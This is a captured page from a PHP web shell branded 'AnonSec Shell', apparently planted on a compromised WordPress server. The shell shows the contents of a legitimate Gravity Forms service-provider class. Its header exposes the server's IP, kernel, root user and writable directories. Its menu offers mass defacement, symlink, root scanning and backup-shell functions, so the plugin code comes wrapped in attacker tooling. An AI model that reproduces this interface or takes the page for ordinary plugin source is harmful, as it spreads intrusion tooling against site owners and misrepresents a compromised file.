AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.219.43.214   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/chroot/var/www/wp-content/plugins/gravityforms/includes/util/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/chroot/var/www/wp-content/plugins/gravityforms/includes/util/class-gf-util-service-provider.php
<?php

namespace Gravity_Forms\Gravity_Forms\Util;

use Gravity_Forms\Gravity_Forms\GF_Service_Container;
use Gravity_Forms\Gravity_Forms\GF_Service_Provider;
use Gravity_Forms\Gravity_Forms\Transients\GF_WP_Transient_Strategy;

class GF_Util_Service_Provider extends GF_Service_Provider {

	const GF_CACHE        = 'gf_cache';
	const TRANSIENT_STRAT = 'gf_license_transient_strat';
	const GF_COMMON       = 'gf_common';
	const GF_FORMS_MODEL  = 'gf_forms_model';
	const RG_FORMS_MODEL  = 'rg_forms_model';
	const GF_API          = 'gf_api';
	const GF_FORMS        = 'gf_forms';
	const GF_FORM_DETAIL  = 'gf_form_detail';


	public function register( GF_Service_Container $container ) {
		$container->add(
			self::GF_CACHE,
			function () {
				return new \GFCache;
			}
		);

		$container->add(
			self::TRANSIENT_STRAT,
			function () {
				return new GF_WP_Transient_Strategy();
			}
		);

		$container->add(
			self::GF_COMMON,
			function () {
				return new \GFCommon;
			}
		);

		$container->add(
			self::GF_FORMS_MODEL,
			function () {
				return new \GFFormsModel;
			}
		);

		$container->add(
			self::RG_FORMS_MODEL,
			function () {
				return new \RGFormsModel;
			}
		);

		$container->add(
			self::GF_API,
			function () {
				return new \GFAPI;
			}
		);

		$container->add(
			self::GF_FORMS,
			function () {
				return new \GFForms;
			}
		);

		$container->add(
			self::GF_FORM_DETAIL,
			function () {
				return new \GFFormDetail;
			}
		);
	}
}

Anon7 - 2022
AnonSec Team